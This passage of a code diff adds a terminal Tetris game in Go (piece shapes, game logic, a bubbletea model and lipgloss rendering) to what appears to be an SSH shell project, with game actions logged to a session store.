|
lipgloss.Color("#FFFF00"), // O — yellow
|
||||||
|
lipgloss.Color("#AA00FF"), // T — purple
|
||||||
|
lipgloss.Color("#00FF00"), // S — green
|
||||||
|
lipgloss.Color("#FF0000"), // Z — red
|
||||||
|
lipgloss.Color("#0000FF"), // J — blue
|
||||||
|
lipgloss.Color("#FF8800"), // L — orange
|
||||||
|
}
|
||||||
|
|
||||||
|
// Each piece has 4 rotations, each rotation is a list of (row, col) offsets
|
||||||
|
// relative to the piece origin.
|
||||||
|
type rotation [4][2]int
|
||||||
|
|
||||||
|
var pieces = [numPieceTypes][4]rotation{
|
||||||
|
// I
|
||||||
|
{
|
||||||
|
{[2]int{0, 0}, [2]int{0, 1}, [2]int{0, 2}, [2]int{0, 3}},
|
||||||
|
{[2]int{0, 0}, [2]int{1, 0}, [2]int{2, 0}, [2]int{3, 0}},
|
||||||
|
{[2]int{0, 0}, [2]int{0, 1}, [2]int{0, 2}, [2]int{0, 3}},
|
||||||
|
{[2]int{0, 0}, [2]int{1, 0}, [2]int{2, 0}, [2]int{3, 0}},
|
||||||
|
},
|
||||||
|
// O
|
||||||
|
{
|
||||||
|
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}},
|
||||||
|
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}},
|
||||||
|
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}},
|
||||||
|
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}},
|
||||||
|
},
|
||||||
|
// T
|
||||||
|
{
|
||||||
|
{[2]int{0, 0}, [2]int{0, 1}, [2]int{0, 2}, [2]int{1, 1}},
|
||||||
|
{[2]int{0, 0}, [2]int{1, 0}, [2]int{2, 0}, [2]int{1, 1}},
|
||||||
|
{[2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}, [2]int{1, 2}},
|
||||||
|
{[2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}, [2]int{2, 1}},
|
||||||
|
},
|
||||||
|
// S
|
||||||
|
{
|
||||||
|
{[2]int{0, 1}, [2]int{0, 2}, [2]int{1, 0}, [2]int{1, 1}},
|
||||||
|
{[2]int{0, 0}, [2]int{1, 0}, [2]int{1, 1}, [2]int{2, 1}},
|
||||||
|
{[2]int{0, 1}, [2]int{0, 2}, [2]int{1, 0}, [2]int{1, 1}},
|
||||||
|
{[2]int{0, 0}, [2]int{1, 0}, [2]int{1, 1}, [2]int{2, 1}},
|
||||||
|
},
|
||||||
|
// Z
|
||||||
|
{
|
||||||
|
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 1}, [2]int{1, 2}},
|
||||||
|
{[2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}, [2]int{2, 0}},
|
||||||
|
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 1}, [2]int{1, 2}},
|
||||||
|
{[2]int{0, 1}, [2]int{1, 0}, [2]int{1, 1}, [2]int{2, 0}},
|
||||||
|
},
|
||||||
|
// J
|
||||||
|
{
|
||||||
|
{[2]int{0, 0}, [2]int{1, 0}, [2]int{1, 1}, [2]int{1, 2}},
|
||||||
|
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 0}, [2]int{2, 0}},
|
||||||
|
{[2]int{0, 0}, [2]int{0, 1}, [2]int{0, 2}, [2]int{1, 2}},
|
||||||
|
{[2]int{0, 0}, [2]int{1, 0}, [2]int{2, 0}, [2]int{2, 1}},
|
||||||
|
},
|
||||||
|
// L
|
||||||
|
{
|
||||||
|
{[2]int{0, 2}, [2]int{1, 0}, [2]int{1, 1}, [2]int{1, 2}},
|
||||||
|
{[2]int{0, 0}, [2]int{1, 0}, [2]int{2, 0}, [2]int{2, 1}},
|
||||||
|
{[2]int{0, 0}, [2]int{0, 1}, [2]int{0, 2}, [2]int{1, 0}},
|
||||||
|
{[2]int{0, 0}, [2]int{0, 1}, [2]int{1, 1}, [2]int{2, 1}},
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// spawnCol returns the starting column for a piece, centering it on the board.
|
||||||
|
func spawnCol(pt pieceType, rot int) int {
|
||||||
|
shape := pieces[pt][rot]
|
||||||
|
minC, maxC := shape[0][1], shape[0][1]
|
||||||
|
for _, off := range shape {
|
||||||
|
if off[1] < minC {
|
||||||
|
minC = off[1]
|
||||||
|
}
|
||||||
|
if off[1] > maxC {
|
||||||
|
maxC = off[1]
|
||||||
|
}
|
||||||
|
}
|
||||||
|
width := maxC - minC + 1
|
||||||
|
return (boardCols - width) / 2
|
||||||
|
}
|
||||||
210
internal/shell/tetris/game.go
Normal file
210
internal/shell/tetris/game.go
Normal file
@@ -0,0 +1,210 @@
|
|||||||
|
package tetris
|
||||||
|
|
||||||
|
import "math/rand/v2"
|
||||||
|
|
||||||
|
const (
|
||||||
|
boardRows = 20
|
||||||
|
boardCols = 10
|
||||||
|
)
|
||||||
|
|
||||||
|
// cell represents a single board cell. Zero value is empty.
|
||||||
|
type cell struct {
|
||||||
|
filled bool
|
||||||
|
piece pieceType // which piece type filled this cell (for color)
|
||||||
|
}
|
||||||
|
|
||||||
|
// gameState holds all mutable state for a Tetris game.
|
||||||
|
type gameState struct {
|
||||||
|
board [boardRows][boardCols]cell
|
||||||
|
current pieceType
|
||||||
|
currentRot int
|
||||||
|
currentRow int
|
||||||
|
currentCol int
|
||||||
|
next pieceType
|
||||||
|
score int
|
||||||
|
level int
|
||||||
|
lines int
|
||||||
|
gameOver bool
|
||||||
|
}
|
||||||
|
|
||||||
|
// newGame creates a new game state, optionally starting at a given level.
|
||||||
|
func newGame(startLevel int) *gameState {
|
||||||
|
g := &gameState{
|
||||||
|
level: startLevel,
|
||||||
|
next: pieceType(rand.IntN(numPieceTypes)),
|
||||||
|
}
|
||||||
|
g.spawnPiece()
|
||||||
|
return g
|
||||||
|
}
|
||||||
|
|
||||||
|
// spawnPiece pulls the next piece and generates a new next.
|
||||||
|
func (g *gameState) spawnPiece() {
|
||||||
|
g.current = g.next
|
||||||
|
g.next = pieceType(rand.IntN(numPieceTypes))
|
||||||
|
g.currentRot = 0
|
||||||
|
g.currentRow = 0
|
||||||
|
g.currentCol = spawnCol(g.current, 0)
|
||||||
|
|
||||||
|
if !g.canPlace(g.current, g.currentRot, g.currentRow, g.currentCol) {
|
||||||
|
g.gameOver = true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// canPlace checks whether the piece fits at the given position.
|
||||||
|
func (g *gameState) canPlace(pt pieceType, rot, row, col int) bool {
|
||||||
|
shape := pieces[pt][rot]
|
||||||
|
for _, off := range shape {
|
||||||
|
r, c := row+off[0], col+off[1]
|
||||||
|
if r < 0 || r >= boardRows || c < 0 || c >= boardCols {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if g.board[r][c].filled {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
// moveLeft moves the current piece left if possible.
|
||||||
|
func (g *gameState) moveLeft() bool {
|
||||||
|
if g.canPlace(g.current, g.currentRot, g.currentRow, g.currentCol-1) {
|
||||||
|
g.currentCol--
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
|
||||||
|
// moveRight moves the current piece right if possible.
|
||||||
|
func (g *gameState) moveRight() bool {
|
||||||
|
if g.canPlace(g.current, g.currentRot, g.currentRow, g.currentCol+1) {
|
||||||
|
g.currentCol++
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
|
||||||
|
// moveDown moves the current piece down one row. Returns false if it cannot.
|
||||||
|
func (g *gameState) moveDown() bool {
|
||||||
|
if g.canPlace(g.current, g.currentRot, g.currentRow+1, g.currentCol) {
|
||||||
|
g.currentRow++
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
|
||||||
|
// rotate rotates the current piece clockwise with wall kick attempts.
|
||||||
|
func (g *gameState) rotate() bool {
|
||||||
|
newRot := (g.currentRot + 1) % 4
|
||||||
|
|
||||||
|
// Try in-place first.
|
||||||
|
if g.canPlace(g.current, newRot, g.currentRow, g.currentCol) {
|
||||||
|
g.currentRot = newRot
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
// Wall kick: try +-1 column offset.
|
||||||
|
for _, offset := range []int{-1, 1} {
|
||||||
|
if g.canPlace(g.current, newRot, g.currentRow, g.currentCol+offset) {
|
||||||
|
g.currentRot = newRot
|
||||||
|
g.currentCol += offset
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// I piece: try +-2.
|
||||||
|
if g.current == pieceI {
|
||||||
|
for _, offset := range []int{-2, 2} {
|
||||||
|
if g.canPlace(g.current, newRot, g.currentRow, g.currentCol+offset) {
|
||||||
|
g.currentRot = newRot
|
||||||
|
g.currentCol += offset
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
|
||||||
|
// ghostRow returns the row where the piece would land.
|
||||||
|
func (g *gameState) ghostRow() int {
|
||||||
|
row := g.currentRow
|
||||||
|
for g.canPlace(g.current, g.currentRot, row+1, g.currentCol) {
|
||||||
|
row++
|
||||||
|
}
|
||||||
|
return row
|
||||||
|
}
|
||||||
|
|
||||||
|
// hardDrop drops the piece to the bottom and returns the number of rows dropped.
|
||||||
|
func (g *gameState) hardDrop() int {
|
||||||
|
ghost := g.ghostRow()
|
||||||
|
dropped := ghost - g.currentRow
|
||||||
|
g.currentRow = ghost
|
||||||
|
return dropped
|
||||||
|
}
|
||||||
|
|
||||||
|
// lockPiece writes the current piece into the board.
|
||||||
|
func (g *gameState) lockPiece() {
|
||||||
|
shape := pieces[g.current][g.currentRot]
|
||||||
|
for _, off := range shape {
|
||||||
|
r, c := g.currentRow+off[0], g.currentCol+off[1]
|
||||||
|
if r >= 0 && r < boardRows && c >= 0 && c < boardCols {
|
||||||
|
g.board[r][c] = cell{filled: true, piece: g.current}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// clearLines removes completed rows and returns how many were cleared.
|
||||||
|
func (g *gameState) clearLines() int {
|
||||||
|
cleared := 0
|
||||||
|
for r := boardRows - 1; r >= 0; r-- {
|
||||||
|
full := true
|
||||||
|
for c := range boardCols {
|
||||||
|
if !g.board[r][c].filled {
|
||||||
|
full = false
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if full {
|
||||||
|
cleared++
|
||||||
|
// Shift everything above down.
|
||||||
|
for rr := r; rr > 0; rr-- {
|
||||||
|
g.board[rr] = g.board[rr-1]
|
||||||
|
}
|
||||||
|
g.board[0] = [boardCols]cell{}
|
||||||
|
r++ // re-check this row since we shifted
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return cleared
|
||||||
|
}
|
||||||
|
|
||||||
|
// NES-style scoring multipliers per lines cleared.
|
||||||
|
var lineScoreMultipliers = [5]int{0, 40, 100, 300, 1200}
|
||||||
|
|
||||||
|
// addScore updates score, lines, and level after clearing rows.
|
||||||
|
func (g *gameState) addScore(linesCleared int) {
|
||||||
|
if linesCleared > 0 && linesCleared <= 4 {
|
||||||
|
g.score += lineScoreMultipliers[linesCleared] * (g.level + 1)
|
||||||
|
}
|
||||||
|
g.lines += linesCleared
|
||||||
|
|
||||||
|
// Level up every 10 lines.
|
||||||
|
newLevel := g.lines / 10
|
||||||
|
if newLevel > g.level {
|
||||||
|
g.level = newLevel
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// afterLock locks the piece, clears lines, scores, and spawns the next piece.
|
||||||
|
// Returns the number of lines cleared.
|
||||||
|
func (g *gameState) afterLock() int {
|
||||||
|
g.lockPiece()
|
||||||
|
cleared := g.clearLines()
|
||||||
|
g.addScore(cleared)
|
||||||
|
g.spawnPiece()
|
||||||
|
return cleared
|
||||||
|
}
|
||||||
|
|
||||||
|
// tickInterval returns the gravity interval in milliseconds for the current level.
|
||||||
|
func tickInterval(level int) int {
|
||||||
|
return max(800-level*60, 100)
|
||||||
|
}
|
||||||
331
internal/shell/tetris/model.go
Normal file
331
internal/shell/tetris/model.go
Normal file
@@ -0,0 +1,331 @@
|
|||||||
|
package tetris
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
tea "github.com/charmbracelet/bubbletea"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
)
|
||||||
|
|
||||||
|
type screen int
|
||||||
|
|
||||||
|
const (
|
||||||
|
screenTitle screen = iota
|
||||||
|
screenGame
|
||||||
|
screenGameOver
|
||||||
|
)
|
||||||
|
|
||||||
|
type tickMsg time.Time
|
||||||
|
type lockMsg time.Time
|
||||||
|
|
||||||
|
const lockDelay = 500 * time.Millisecond
|
||||||
|
|
||||||
|
type model struct {
|
||||||
|
sess *shell.SessionContext
|
||||||
|
difficulty string
|
||||||
|
screen screen
|
||||||
|
game *gameState
|
||||||
|
quitting bool
|
||||||
|
height int
|
||||||
|
keypresses int
|
||||||
|
locking bool // true when piece has landed and lock delay is active
|
||||||
|
}
|
||||||
|
|
||||||
|
func newModel(sess *shell.SessionContext, difficulty string) *model {
|
||||||
|
return &model{
|
||||||
|
sess: sess,
|
||||||
|
difficulty: difficulty,
|
||||||
|
screen: screenTitle,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) Init() tea.Cmd {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||||
|
if m.quitting {
|
||||||
|
return m, tea.Quit
|
||||||
|
}
|
||||||
|
|
||||||
|
switch msg := msg.(type) {
|
||||||
|
case tea.WindowSizeMsg:
|
||||||
|
m.height = msg.Height
|
||||||
|
return m, nil
|
||||||
|
case tea.KeyMsg:
|
||||||
|
m.keypresses++
|
||||||
|
if msg.Type == tea.KeyCtrlC {
|
||||||
|
m.quitting = true
|
||||||
|
return m, tea.Batch(
|
||||||
|
logAction(m.sess, fmt.Sprintf("QUIT score=%d level=%d lines=%d keys=%d", m.gameScore(), m.gameLevel(), m.gameLines(), m.keypresses), "SESSION ENDED"),
|
||||||
|
tea.Quit,
|
||||||
|
)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
switch m.screen {
|
||||||
|
case screenTitle:
|
||||||
|
return m.updateTitle(msg)
|
||||||
|
case screenGame:
|
||||||
|
return m.updateGame(msg)
|
||||||
|
case screenGameOver:
|
||||||
|
return m.updateGameOver(msg)
|
||||||
|
}
|
||||||
|
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) View() string {
|
||||||
|
var content string
|
||||||
|
switch m.screen {
|
||||||
|
case screenTitle:
|
||||||
|
content = m.titleView()
|
||||||
|
case screenGame:
|
||||||
|
content = gameView(m.game)
|
||||||
|
case screenGameOver:
|
||||||
|
content = m.gameOverView()
|
||||||
|
}
|
||||||
|
|
||||||
|
return gameFrame(content, m.height)
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Title screen ---
|
||||||
|
|
||||||
|
func (m *model) titleView() string {
|
||||||
|
var b strings.Builder
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(titleStyle.Render(" ████████╗███████╗████████╗██████╗ ██╗███████╗"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(titleStyle.Render(" ╚══██╔══╝██╔════╝╚══██╔══╝██╔══██╗██║██╔════╝"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(titleStyle.Render(" ██║ █████╗ ██║ ██████╔╝██║███████╗"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(titleStyle.Render(" ██║ ██╔══╝ ██║ ██╔══██╗██║╚════██║"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(titleStyle.Render(" ██║ ███████╗ ██║ ██║ ██║██║███████║"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(titleStyle.Render(" ╚═╝ ╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚══════╝"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(baseStyle.Render(" Press any key to start"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) updateTitle(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||||
|
if _, ok := msg.(tea.KeyMsg); ok {
|
||||||
|
m.screen = screenGame
|
||||||
|
var startLevel int
|
||||||
|
if m.difficulty == "hard" {
|
||||||
|
startLevel = 5
|
||||||
|
}
|
||||||
|
m.game = newGame(startLevel)
|
||||||
|
return m, tea.Batch(
|
||||||
|
tea.ClearScreen,
|
||||||
|
m.scheduleTick(),
|
||||||
|
logAction(m.sess, "GAME START", fmt.Sprintf("difficulty=%s", m.difficulty)),
|
||||||
|
)
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Game screen ---
|
||||||
|
|
||||||
|
func (m *model) scheduleTick() tea.Cmd {
|
||||||
|
ms := tickInterval(m.game.level)
|
||||||
|
if m.difficulty == "easy" {
|
||||||
|
ms = max(1000-m.game.level*60, 150)
|
||||||
|
}
|
||||||
|
return tea.Tick(time.Duration(ms)*time.Millisecond, func(t time.Time) tea.Msg {
|
||||||
|
return tickMsg(t)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) scheduleLock() tea.Cmd {
|
||||||
|
return tea.Tick(lockDelay, func(t time.Time) tea.Msg {
|
||||||
|
return lockMsg(t)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// performLock locks the piece, clears lines, and returns commands for logging
|
||||||
|
// and scheduling the next tick. Returns nil if game over (goToGameOver is
|
||||||
|
// included in the returned batch).
|
||||||
|
func (m *model) performLock() tea.Cmd {
|
||||||
|
m.locking = false
|
||||||
|
cleared := m.game.afterLock()
|
||||||
|
if m.game.gameOver {
|
||||||
|
return tea.Batch(
|
||||||
|
logAction(m.sess, fmt.Sprintf("GAME OVER score=%d level=%d lines=%d keys=%d", m.game.score, m.game.level, m.game.lines, m.keypresses), "GAME OVER"),
|
||||||
|
m.goToGameOver(),
|
||||||
|
)
|
||||||
|
}
|
||||||
|
var cmds []tea.Cmd
|
||||||
|
cmds = append(cmds, m.scheduleTick())
|
||||||
|
if cleared > 0 {
|
||||||
|
cmds = append(cmds, logAction(m.sess, fmt.Sprintf("LINES %d score=%d", cleared, m.game.score), fmt.Sprintf("total=%d", m.game.lines)))
|
||||||
|
prevLevel := (m.game.lines - cleared) / 10
|
||||||
|
if m.game.level > prevLevel {
|
||||||
|
cmds = append(cmds, logAction(m.sess, fmt.Sprintf("LEVEL UP %d", m.game.level), fmt.Sprintf("score=%d", m.game.score)))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return tea.Batch(cmds...)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) updateGame(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||||
|
switch msg := msg.(type) {
|
||||||
|
case lockMsg:
|
||||||
|
if m.game.gameOver || !m.locking {
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
// Lock delay expired — lock the piece now.
|
||||||
|
return m, m.performLock()
|
||||||
|
|
||||||
|
case tickMsg:
|
||||||
|
if m.game.gameOver || m.locking {
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
if !m.game.moveDown() {
|
||||||
|
// Piece landed — start lock delay instead of locking immediately.
|
||||||
|
m.locking = true
|
||||||
|
return m, m.scheduleLock()
|
||||||
|
}
|
||||||
|
return m, m.scheduleTick()
|
||||||
|
|
||||||
|
case tea.KeyMsg:
|
||||||
|
if m.game.gameOver {
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
switch msg.String() {
|
||||||
|
case "left":
|
||||||
|
m.game.moveLeft()
|
||||||
|
// If piece can now drop further, cancel lock delay.
|
||||||
|
if m.locking && m.game.canPlace(m.game.current, m.game.currentRot, m.game.currentRow+1, m.game.currentCol) {
|
||||||
|
m.locking = false
|
||||||
|
}
|
||||||
|
case "right":
|
||||||
|
m.game.moveRight()
|
||||||
|
if m.locking && m.game.canPlace(m.game.current, m.game.currentRot, m.game.currentRow+1, m.game.currentCol) {
|
||||||
|
m.locking = false
|
||||||
|
}
|
||||||
|
case "down":
|
||||||
|
if m.game.moveDown() {
|
||||||
|
m.game.score++ // soft drop bonus
|
||||||
|
if m.locking {
|
||||||
|
m.locking = false
|
||||||
|
}
|
||||||
|
}
|
||||||
|
case "up", "z":
|
||||||
|
m.game.rotate()
|
||||||
|
if m.locking && m.game.canPlace(m.game.current, m.game.currentRot, m.game.currentRow+1, m.game.currentCol) {
|
||||||
|
m.locking = false
|
||||||
|
}
|
||||||
|
case " ":
|
||||||
|
m.locking = false
|
||||||
|
dropped := m.game.hardDrop()
|
||||||
|
m.game.score += dropped * 2
|
||||||
|
return m, m.performLock()
|
||||||
|
case "q":
|
||||||
|
m.quitting = true
|
||||||
|
return m, tea.Batch(
|
||||||
|
logAction(m.sess, fmt.Sprintf("QUIT score=%d level=%d lines=%d keys=%d", m.game.score, m.game.level, m.game.lines, m.keypresses), "PLAYER QUIT"),
|
||||||
|
tea.Quit,
|
||||||
|
)
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Game over screen ---
|
||||||
|
|
||||||
|
func (m *model) goToGameOver() tea.Cmd {
|
||||||
|
m.screen = screenGameOver
|
||||||
|
return tea.ClearScreen
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) gameOverView() string {
|
||||||
|
var b strings.Builder
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(titleStyle.Render(" GAME OVER"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" Score: %s", formatScore(m.game.score))))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" Level: %d", m.game.level)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" Lines: %d", m.game.lines)))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(dimStyle.Render(" R - Play again"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(dimStyle.Render(" Q - Quit"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) updateGameOver(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||||
|
if keyMsg, ok := msg.(tea.KeyMsg); ok {
|
||||||
|
switch keyMsg.String() {
|
||||||
|
case "r":
|
||||||
|
startLevel := 0
|
||||||
|
if m.difficulty == "hard" {
|
||||||
|
startLevel = 5
|
||||||
|
}
|
||||||
|
m.game = newGame(startLevel)
|
||||||
|
m.screen = screenGame
|
||||||
|
m.keypresses = 0
|
||||||
|
return m, tea.Batch(
|
||||||
|
tea.ClearScreen,
|
||||||
|
m.scheduleTick(),
|
||||||
|
logAction(m.sess, "RESTART", fmt.Sprintf("difficulty=%s", m.difficulty)),
|
||||||
|
)
|
||||||
|
case "q":
|
||||||
|
m.quitting = true
|
||||||
|
return m, tea.Batch(
|
||||||
|
logAction(m.sess, fmt.Sprintf("QUIT score=%d level=%d lines=%d keys=%d", m.game.score, m.game.level, m.game.lines, m.keypresses), "PLAYER QUIT"),
|
||||||
|
tea.Quit,
|
||||||
|
)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// Helper methods for safe access when game may be nil.
|
||||||
|
func (m *model) gameScore() int {
|
||||||
|
if m.game != nil {
|
||||||
|
return m.game.score
|
||||||
|
}
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) gameLevel() int {
|
||||||
|
if m.game != nil {
|
||||||
|
return m.game.level
|
||||||
|
}
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) gameLines() int {
|
||||||
|
if m.game != nil {
|
||||||
|
return m.game.lines
|
||||||
|
}
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
|
||||||
|
// logAction returns a tea.Cmd that logs an action to the session store.
|
||||||
|
func logAction(sess *shell.SessionContext, input, output string) tea.Cmd {
|
||||||
|
return func() tea.Msg {
|
||||||
|
if sess.Store != nil {
|
||||||
|
ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
|
||||||
|
defer cancel()
|
||||||
|
_ = sess.Store.AppendSessionLog(ctx, sess.SessionID, input, output)
|
||||||
|
}
|
||||||
|
if sess.OnCommand != nil {
|
||||||
|
sess.OnCommand("tetris")
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
}
|
||||||
286
internal/shell/tetris/style.go
Normal file
286
internal/shell/tetris/style.go
Normal file
@@ -0,0 +1,286 @@
|
|||||||
|
package tetris
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
"github.com/charmbracelet/lipgloss"
|
||||||
|
)
|
||||||
|
|
||||||
|
const termWidth = 80
|
||||||
|
|
||||||
|
var (
|
||||||
|
colorWhite = lipgloss.Color("#FFFFFF")
|
||||||
|
colorDim = lipgloss.Color("#555555")
|
||||||
|
colorBlack = lipgloss.Color("#000000")
|
||||||
|
colorGhost = lipgloss.Color("#333333")
|
||||||
|
)
|
||||||
|
|
||||||
|
var (
|
||||||
|
baseStyle = lipgloss.NewStyle().
|
||||||
|
Foreground(colorWhite).
|
||||||
|
Background(colorBlack)
|
||||||
|
|
||||||
|
dimStyle = lipgloss.NewStyle().
|
||||||
|
Foreground(colorDim).
|
||||||
|
Background(colorBlack)
|
||||||
|
|
||||||
|
titleStyle = lipgloss.NewStyle().
|
||||||
|
Foreground(lipgloss.Color("#00FFFF")).
|
||||||
|
Background(colorBlack).
|
||||||
|
Bold(true)
|
||||||
|
|
||||||
|
sidebarLabelStyle = lipgloss.NewStyle().
|
||||||
|
Foreground(colorDim).
|
||||||
|
Background(colorBlack)
|
||||||
|
|
||||||
|
sidebarValueStyle = lipgloss.NewStyle().
|
||||||
|
Foreground(colorWhite).
|
||||||
|
Background(colorBlack).
|
||||||
|
Bold(true)
|
||||||
|
)
|
||||||
|
|
||||||
|
// cellStyle returns a style for a filled cell of a given piece type.
|
||||||
|
func cellStyle(pt pieceType) lipgloss.Style {
|
||||||
|
return lipgloss.NewStyle().
|
||||||
|
Foreground(pieceColors[pt]).
|
||||||
|
Background(colorBlack)
|
||||||
|
}
|
||||||
|
|
||||||
|
// ghostStyle returns a dimmed style for the ghost piece.
|
||||||
|
func ghostCellStyle() lipgloss.Style {
|
||||||
|
return lipgloss.NewStyle().
|
||||||
|
Foreground(colorGhost).
|
||||||
|
Background(colorBlack)
|
||||||
|
}
|
||||||
|
|
||||||
|
// renderBoard renders the board, current piece, and ghost piece as a string.
|
||||||
|
func renderBoard(g *gameState) string {
|
||||||
|
// Build a display grid that includes the current piece and ghost.
|
||||||
|
type displayCell struct {
|
||||||
|
filled bool
|
||||||
|
ghost bool
|
||||||
|
piece pieceType
|
||||||
|
}
|
||||||
|
var grid [boardRows][boardCols]displayCell
|
||||||
|
|
||||||
|
// Copy locked cells.
|
||||||
|
for r := range boardRows {
|
||||||
|
for c := range boardCols {
|
||||||
|
if g.board[r][c].filled {
|
||||||
|
grid[r][c] = displayCell{filled: true, piece: g.board[r][c].piece}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Ghost piece.
|
||||||
|
ghostR := g.ghostRow()
|
||||||
|
if ghostR != g.currentRow {
|
||||||
|
shape := pieces[g.current][g.currentRot]
|
||||||
|
for _, off := range shape {
|
||||||
|
r, c := ghostR+off[0], g.currentCol+off[1]
|
||||||
|
if r >= 0 && r < boardRows && c >= 0 && c < boardCols && !grid[r][c].filled {
|
||||||
|
grid[r][c] = displayCell{ghost: true, piece: g.current}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Current piece.
|
||||||
|
shape := pieces[g.current][g.currentRot]
|
||||||
|
for _, off := range shape {
|
||||||
|
r, c := g.currentRow+off[0], g.currentCol+off[1]
|
||||||
|
if r >= 0 && r < boardRows && c >= 0 && c < boardCols {
|
||||||
|
grid[r][c] = displayCell{filled: true, piece: g.current}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Render grid.
|
||||||
|
var b strings.Builder
|
||||||
|
borderStyle := dimStyle
|
||||||
|
|
||||||
|
for _, row := range grid {
|
||||||
|
b.WriteString(borderStyle.Render("|"))
|
||||||
|
for _, dc := range row {
|
||||||
|
switch {
|
||||||
|
case dc.filled:
|
||||||
|
b.WriteString(cellStyle(dc.piece).Render("[]"))
|
||||||
|
case dc.ghost:
|
||||||
|
b.WriteString(ghostCellStyle().Render("::"))
|
||||||
|
default:
|
||||||
|
b.WriteString(baseStyle.Render(" "))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
b.WriteString(borderStyle.Render("|"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
